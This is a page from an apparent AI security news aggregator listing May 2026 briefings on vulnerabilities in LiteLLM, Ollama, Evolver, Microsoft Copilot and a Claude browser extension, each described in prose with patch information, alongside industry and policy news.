aisecwatch.com
DashboardVulnerabilitiesNewsResearchArchiveStatsDatasetFor devs
Subscribe
aisecwatch.com

Real-time AI security monitoring. Tracking AI-related vulnerabilities, safety and security incidents, privacy risks, research developments, and policy changes.

Navigation

VulnerabilitiesNewsResearchDigest ArchiveNewsletter ArchiveSubscribeData SourcesStatisticsDatasetAPIIntegrationsWidgetRSS Feed

Maintained by

Truong (Jack) Luu

Information Systems Researcher

AI Sec Watch

The security intelligence platform for AI teams

AI security threats move fast and get buried under hype and noise. Built by an Information Systems Security researcher to help security teams and developers stay ahead of vulnerabilities, privacy incidents, safety research, and policy developments.

Independent research. No sponsors, no paywalls, no conflicts of interest.

[TOTAL_TRACKED]
3,710
[LAST_24H]
1
[LAST_7D]
67
Daily BriefingFriday, May 8, 2026
>

Critical RCE Vulnerabilities in LiteLLM Proxy Server: LiteLLM, a proxy server that forwards requests to AI model APIs, disclosed three critical and high-severity flaws in versions 1.74.2 through 1.83.6. Two test endpoints allowed attackers with valid API keys to execute arbitrary code (running any commands an attacker wants) on the server by submitting malicious configurations or prompt templates without sandboxing (CVE-2026-42271, CVE-2026-42203, both critical), while a SQL injection flaw (inserting malicious code into database queries) let unauthenticated attackers read or modify stored API credentials (CVE-2026-42208, high).

>

ClaudeBleed Exploit Allows Extension Hijacking in Chrome: Anthropic's Claude browser extension contains a vulnerability that allows malicious Chrome extensions to hijack it and perform unauthorized actions like exfiltrating files, sending emails, or stealing code from private repositories. The flaw stems from the extension trusting any script from claude.ai without verifying the actual caller, and while Anthropic released a partial fix in version 1.0.70 on May 6, researchers report it remains exploitable when the extension runs in privileged mode.

Latest Intel

page 14/371
VIEW ALL
01

CVE-2026-42075: Evolver is a GEP-powered self-evolving engine for AI agents. Prior to version 1.69.3, a path traversal vulnerability in

security
May 4, 2026

Evolver, a GEP-powered self-evolving engine for AI agents, contained a path traversal vulnerability (a type of attack where an attacker manipulates file paths to access files outside their intended directory) in versions before 1.69.3. The vulnerability was in the skill download command's --out= flag, which did not validate user-provided file paths, allowing attackers to write files to any location on the system, potentially overwriting critical files.

Critical This Week5 issues
critical

CVE-2026-42271: LiteLLM is a proxy server (AI Gateway) to call LLM APIs in OpenAI (or native) format. From version 1.74.2 to before vers

CVE-2026-42271NVD/CVE DatabaseMay 8, 2026
May 8, 2026
>

AI Systems Show Triple the High-Risk Vulnerabilities of Legacy Software: Penetration testing data reveals that AI and LLM systems have 32% of findings rated high-risk compared to just 13% for traditional software, with only 38% of high-risk AI issues getting resolved. Security experts attribute this gap to rapid deployment without mature controls, novel attack surfaces like prompt injection (tricking AI by hiding instructions in input), and fragmented responsibility for remediation across teams.

>

Model Context Protocol Emerging as Critical Security Blind Spot: Model Context Protocol (MCP, a plugin system connecting AI agents to external tools) has become a major vulnerability vector as organizations fail to scan for or monitor MCP-related risks. Recent supply chain attacks, such as the postmark-mcp npm package that exfiltrated emails from 300 organizations, demonstrate how attackers exploit widely-trusted MCP packages and hardcoded credentials in AI configurations to enable credential theft and supply chain compromises at scale.

Fix: This issue has been patched in version 1.69.3. Users should upgrade to version 1.69.3 or later.

NVD/CVE Database
02

Anthropic teams with Goldman, Blackstone and others on $1.5 billion AI venture targeting PE-owned firms

industry
May 4, 2026

Anthropic has partnered with Goldman Sachs, Blackstone, and other investment firms to create a $1.5 billion venture that will deploy Claude, Anthropic's AI model, directly into businesses. The partnership aims to address a shortage of experts who can implement AI technology in real-world business operations by embedding engineers inside companies to redesign workflows and integrate AI into core processes, starting with companies owned by the investment firms.

CNBC Technology
03

AI platforms reference Nigel Farage more than other leaders when prompted on UK politics, study shows

research
May 4, 2026

A study found that AI platforms disproportionately reference Nigel Farage and Reform UK more than other UK political leaders when answering questions about British politics. Researchers suggest this indicates Reform UK has achieved unusual visibility in LLMs (large language models, AI systems trained on text data to generate responses).

The Guardian Technology
04

Week one of the Musk v. Altman trial: What it was like in the room

policy
May 4, 2026

Elon Musk is suing OpenAI and CEO Sam Altman in federal court, claiming he invested millions expecting OpenAI to remain a nonprofit organization but alleges the company was secretly converted into a for-profit corporation, deceiving him about its original mission. The trial centers on whether Musk was actually deceived and when he discovered this alleged misconduct, with Musk seeking damages and the reversal of OpenAI's restructuring that reduced the nonprofit portion's control.

MIT Technology Review
05

Musk texted OpenAI's Brockman about settlement two days before trial began

policy
May 4, 2026

Elon Musk, who co-founded OpenAI in 2015, is suing the company for allegedly breaking its commitment to remain a nonprofit and pursue a charitable mission, claiming they instead commercialized the AI technology. Two days before the trial started, Musk texted OpenAI's president Greg Brockman about settling the case, but when Brockman suggested both sides drop their claims, Musk responded with a threat about making him and CEO Sam Altman "the most hated men in America."

CNBC Technology
06

CVE-2026-7482: Ollama before 0.17.1 contains a heap out-of-bounds read vulnerability in the GGUF model loader. The /api/create endpoint

security
May 4, 2026

Ollama versions before 0.17.1 have a heap out-of-bounds read vulnerability (a bug where code reads memory outside its intended boundaries) in the GGUF model loader (the component that loads GGUF files, a machine learning model format). An attacker can upload a malicious GGUF file through the /api/create endpoint (an unprotected interface) with fake tensor size information, causing the server to read beyond the file's actual data and leak sensitive information like API keys and user conversations, which can then be stolen through the /api/push endpoint.

Fix: Update Ollama to version 0.17.1 or later.

NVD/CVE Database
07

Copirate 365 at DEF CON: Plundering in the Depths of Microsoft Copilot (CVE-2026-24299)

security
May 4, 2026

This writeup describes vulnerabilities found in Microsoft Copilot products that allow attackers to steal sensitive data through multiple attack chains, including data exfiltration via HTML preview features, hijacking the AI's long-term memory through prompt injection (tricking an AI by hiding instructions in its input), and creating persistent backdoors. The vulnerabilities, assigned CVE-2026-24299, exploited what researchers call the "lethal trifecta," where an AI has access to private data, untrusted content, and external communication channels simultaneously.

Fix: Microsoft patched these issues. The source states: "MSRC assigned CVE-2026-24299 and the issues are now patched." No specific patch version number or detailed mitigation steps are provided in the source text.

Embrace The Red
08

Security agencies draw red lines around agentic AI deployments

securitypolicy
May 4, 2026

Security agencies including CISA have issued joint guidance on safely deploying agentic AI (autonomous AI systems that can take actions independently), warning that prompt injection (tricking an AI by hiding instructions in its input) and other attacks are common threats. The advisory recommends organizations implement strict access controls using the principle of least privilege (giving systems only the minimum permissions they need), continuous monitoring with human oversight, and careful testing before deploying AI agents to production environments.

Fix: The source text outlines recommended design and development guidelines including: strong authentication using Secure by Design principles, enforcing least-privilege principles and isolating agent capabilities, maintaining a clear inventory of agent capabilities and dependencies, implementing continuous monitoring and auditing of AI agent operations, integrating human control and oversight into workflows (including live monitoring during task execution and human approval for decision-making steps), validating how agents interpret inputs to guard against prompt injection, and regular testing of incident response plans.

CSO Online
09

OpenAI Rolls Out Advanced Security for ChatGPT Accounts

security
May 4, 2026

OpenAI has introduced Advanced Account Security, an optional feature for ChatGPT users at high risk of targeted attacks, such as journalists and political dissidents. The feature strengthens account protection by disabling password-based login in favor of physical security keys or passkeys, replacing email and SMS account recovery with backup passkeys and recovery keys, shortening sign-in sessions, and automatically excluding user conversations from AI model training.

Fix: OpenAI offers Advanced Account Security as a mitigation. Users can enable this opt-in feature, which includes: disabling password-based login and requiring physical security keys or passkeys (OpenAI has partnered with Yubico to offer YubiKey devices at a discount); replacing email and SMS account recovery with backup passkeys, recovery keys, and security keys; shortening sign-in sessions; and receiving alerts about logins with the ability to manage active sessions. Users can enroll through OpenAI's dedicated enrollment page for Advanced Account Security.

SecurityWeek
10

The fake IT worker problem CISOs can’t ignore

securitysafety
May 4, 2026

Fake IT workers, increasingly enabled by AI tools and deepfakes, are being hired into organizations as an insider threat (a risk posed by trusted employees or contractors with system access). State actors like North Korea and individuals use stolen or synthetic identities, AI-assisted interview responses, and social engineering to bypass recruitment screening and gain access to sensitive systems and data.

CSO Online
Prev1...1213141516...371Next
critical

CVE-2026-42203: LiteLLM is a proxy server (AI Gateway) to call LLM APIs in OpenAI (or native) format. From version 1.80.5 to before vers

CVE-2026-42203NVD/CVE DatabaseMay 8, 2026
May 8, 2026
critical

Gemini CLI Vulnerability Could Have Led to Code Execution, Supply Chain Attack

SecurityWeekMay 7, 2026
May 7, 2026
critical

GHSA-9h64-2846-7x7f: Axonflow fixed bugs by implementing multi-tenant isolation and access-control hardening

GitHub Advisory DatabaseMay 6, 2026
May 6, 2026
critical

GHSA-gmvf-9v4p-v8jc: fast-jwt: JWT auth bypass due to empty HMAC secret accepted by async key resolver

CVE-2026-44351GitHub Advisory DatabaseMay 6, 2026
May 6, 2026